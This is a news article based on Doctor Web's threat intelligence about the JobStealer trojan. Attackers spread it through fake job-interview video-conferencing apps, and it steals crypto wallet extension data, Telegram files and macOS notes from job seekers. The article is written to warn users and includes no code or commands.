The “JobStealer” Trojan Hijacking Crypto Wallets via Fake Meetings

The job market is tough enough without a scheduled interview turning into a devastating cyber heist. According to new threat intelligence, a sophisticated cybercriminal campaign is leveraging the anxiety and hope of job seekers to deploy a vicious data-stealing trojan.

Doctor Web’s experts warned users about the spread of JobStealer, a trojan app that steals confidential information from macOS and Windows computer users.

This is not a traditional phishing attack relying on fake invoices; it is a highly targeted social engineering operation that exploits professional trust.

The scam is meticulously crafted to lower a victim’s defenses. The attack begins with the threat actors contacting potential victims and offering them a particular job vacancy. Once the victim agrees to an interview, the attackers instruct them to download a specific video conferencing application to facilitate the call.

They invite users to a job interview and provide them with links to websites for the online meeting ‘platforms’-supposedly to connect to a video conference. However, these sleek, professional-looking sites are elaborate traps. “In reality, this software is the JobStealer trojan”.

To mask their tracks, the attackers frequently rebrand their malicious payloads. “Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others”. They even go so far as to build fake corporate footprints. To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts-for example, on X.

When a macOS user attempts to download the software, the attackers use clever tactics to bypass standard security protocols. To install the app on devices running macOS, visitors to malicious websites are provided with two options: copy the bash command listed on the website and run it in the terminal; download a disk image file in the .dmg format and launch it.

If the victim chooses the disk image, they are met with deceptive instructions. The mounted image tells the user to drag a provided script directly into their terminal window. “In fact, instead of the video conferencing app getting installed, the script will launch the trojan file”.

Once the trojan executes, it relies on a classic phishing technique to gain ultimate control. When launched, Mac. PWS.JobStealer. 1 displays a phishing window that alerts users about an alleged error in the app’s operation. To ‘fix’ this error, the malicious program asks users to provide their user account password.

While it collects system information and passwords, JobStealer has a very specific primary objective. “It primarily aims to hijack data from crypto wallets”.

Once armed with the user’s password, the malware ruthlessly strips the machine of valuable data, specifically targeting:

• data from about 300 crypto wallet browser extensions installed in target browsers based on Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc).
• Telegram messenger files… where session authorization keys, downloaded files, etc., are stored.
• user notes from the native macOS Notes application.
• evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.

All of this harvested data is rapidly compressed into a ZIP archive and exfiltrated to the attacker’s Command and Control (C2) server.

While the macOS variant is highly active, Windows users are not safe. The malware’s creators have also prepared a version of JobStealer for computers running the Windows operating syste”.

More alarmingly, the infrastructure for a massive cross-platform expansion is already visible. The malicious download sites feature sections for Linux, iOS, and Android applications. While these links currently inform users the apps are “in development” or redirect to the Windows variant, Doctor Web’s analysts issued a warning: “At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future”.